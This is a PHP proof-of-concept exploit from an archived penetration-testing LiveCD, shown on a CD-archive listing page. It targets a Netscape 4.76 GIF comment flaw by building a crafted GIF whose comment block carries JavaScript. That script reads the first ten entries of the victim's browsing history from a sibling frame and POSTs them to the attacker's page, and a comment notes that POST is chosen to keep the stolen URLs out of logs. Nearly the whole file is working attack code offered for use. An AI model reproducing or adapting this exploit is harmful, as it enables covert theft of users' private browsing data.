home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webbrowser / Netscape / ns476gifcomment.php < prev    next >
Encoding:
PHP Script  |  2005-02-12  |  5.9 KB  |  148 lines
  1. <?
  2. /*
  3. Netscape 4.76 gif comment flaw
  4.  
  5. Florian Wesch <fw@dividuum.de>
  6. http://dividuum.de
  7. */
  8.  
  9. $self="http://".$SERVER_NAME.(($SERVER_PORT==80)?"":":$SERVER_PORT").$PHP_SELF;
  10. if (strlen($self)>64) {
  11.     echo "Url of $self is too long. 64 maximum.<br>";
  12.     echo "You can change this but I think 64 should be enough for anybody ;-)";
  13.     exit;
  14. }
  15.  
  16. if (!isset($mode)) $mode="intro";
  17.  
  18. // If urllist is submitted
  19. if (isset($u)) $mode="showhist";
  20.  
  21. switch ($mode) {
  22.     case "intro":
  23.         ?>
  24.         <html>
  25.             <body>
  26.                 <a href="<? echo $self; ?>?mode=frameset">Submit 10 urls of your history</a><br>
  27.             </body>
  28.         </html>
  29.         <?
  30.         break;
  31.     case "frameset":
  32.         ?>
  33.         <html>
  34.             <frameset rows="50%,50%" border=0 frameborder=0 framespacing=0>
  35.                 <frame src="<? echo $self; ?>?mode=loadhistory" name="foo" scrolling=no>
  36.                 <frame src="<? echo $self; ?>?mode=showimageinfo" name="bar" scrolling=no>
  37.             </frameset>
  38.         </html>
  39.         <?
  40.         break;
  41.     case "loadhistory":
  42.         // replaces the current document with about:global using javascript
  43.         ?>
  44.         <html>
  45.             <base href="about:">
  46.             <form action="global" name="loadhistory">
  47.                 <input type="submit">
  48.             </form>
  49.             <script language="javascript">
  50.                 document.loadhistory.submit();
  51.             </script>
  52.         </html>
  53.         <?
  54.         break;
  55.     case "showimageinfo":
  56.         ?>
  57.         <html>
  58.             <head>
  59.                 <meta http-equiv="refresh" content="5; URL=about:<? echo $self; ?>?mode=evilgif">
  60.             </head>
  61.             <body>
  62.                 Waiting 5 seconds...<br>
  63.                 <img src="<? echo $self; ?>?mode=evilgif">
  64.             </body>
  65.         </html>
  66.         <?
  67.         break;
  68.     case "evilgif":
  69.         // Gifs are supposed to be compressed. The program I
  70.         // used sucks :-)
  71.         header("Content-type: image/gif");
  72.         $gif ="4749463839610a000a00f70000ffffffffffccffff";
  73.         $gif.="99ffff66ffff33ffff00ffccffffccccffcc99ffcc6";
  74.         $gif.="6ffcc33ffcc00ff99ffff99ccff9999ff9966ff9933";
  75.         $gif.="ff9900ff66ffff66ccff6699ff6666ff6633ff6600f";
  76.         $gif.="f33ffff33ccff3399ff3366ff3333ff3300ff00ffff";
  77.         $gif.="00ccff0099ff0066ff0033ff0000fffffffffffffff";
  78.         $gif.="fffffffffffffffffffffffffffffffffffffffffff";
  79.         $gif.="fffffffffffffffffffffffffffffffffffffffffff";
  80.         $gif.="fffffffffffffffffffffffffffffffffffffffffff";
  81.         $gif.="ffffffffffffffffffffffff0000000000000000000";
  82.         $gif.="0000000000000000000000000000000000000000000";
  83.         $gif.="0000000000000000000000000000000000000000000";
  84.         $gif.="0000000000000000000000000000000000000000000";
  85.         $gif.="0000000000000000000000000000000000000000000";
  86.         $gif.="0000000000000000000000000000000000000000000";
  87.         $gif.="0000000000000000000000000000000000000000000";
  88.         $gif.="0000000000000000000000000000000000000000000";
  89.         $gif.="0000000000000000000000000000000000000000000";
  90.         $gif.="0000000000000000000000000000000000000000000";
  91.         $gif.="0000000000000000000000000000000000000000000";
  92.         $gif.="0000000000000000000000000000000000000000000";
  93.         $gif.="0000000000000000000000000000000000000000000";
  94.         $gif.="0000000000000000000000000000000000000000000";
  95.         $gif.="0000000000000000000000000000000000000000000";
  96.         $gif.="0000000000000000000000000000000000000000000";
  97.         $gif.="0000000000000000000000000000000000000000000";
  98.         $gif.="0000000000000000000000000000000000000000000";
  99.         $gif.="0000000000000000000000000000000000000000000";
  100.         $gif.="0000000000000000000000000000000000000000000";
  101.         $gif.="0000000000000000000000000000000000000000000";
  102.         $gif.="0000000000000000000000000000000000000000000";
  103.         $gif.="0000000000000000000000000000000000000000000";
  104.         $gif.="0000000000000000000000000000000000000000000";
  105.         $gif.="0000000000000000000000000000000000000000000";
  106.         $gif.="0000000000000000000000000000000000000000000";
  107.         $gif.="0000000000000000000000000000000000000000000";
  108.         $gif.="00000000000000021feff";
  109.         $gif.=bin2hex(sprintf("%77s%s",
  110.  
  111.       /*"<form action=".$self,' target=_parent name=s method=get >'.*/
  112.       /* I'm using POST so the submitted urls do not appear in the logfile */
  113.         "<form action=".$self,' target=_parent name=s method=post>'.
  114.             '<input name=u>'.
  115.         '</form>'.
  116.         '<script>'.
  117.             'f=parent.frames["foo"].document;'.
  118.             'l="";'.
  119.           /*'for(i=0;i<f.links.length;i++)'.*/
  120.             'for(i=0;i<10            ;i++)'.
  121.                 'l+=f.links[i]+"|";'.
  122.             'document.s.u.value=l;'.
  123.             'document.'.chr(255).'s.submit();'.
  124.         '</script>'));
  125.  
  126.         $gif.=              "00000000000000000000000000000";
  127.         $gif.="0000000000000000000000000000000000000000000";
  128.         $gif.="0000000000000000000000000000000000000000000";
  129.         $gif.="0000000000000000000000000000000000000000000";
  130.         $gif.="0000000000000000000000000000000000000000000";
  131.         $gif.="0000000000000000000000000000000000000000000";
  132.         $gif.="0000000000000000000000000000000000000000000";
  133.         $gif.="0000000000000000000000000000000000000000000";
  134.         $gif.="0000000000000000000000000000000000000000000";
  135.         $gif.="0000000000000000000000000000000000000000000";
  136.         $gif.="0000000000000000000000000000000000000000000";
  137.         $gif.="00000000000002c000000000a000a00000813004708";
  138.         $gif.="1c48b0a0c18308132a5cc8b061c28000003b";
  139.         echo pack("H".strlen($gif), $gif);
  140.         break;
  141.     case "showhist":
  142.         $urls=explode("|",$u);
  143.         echo "<h1>Top 10 urls in about:global</h1>";
  144.         foreach ($urls as $url) {
  145.             echo "<a href=$url>$url</a><br>";
  146.         }
  147.     };
  148. ?>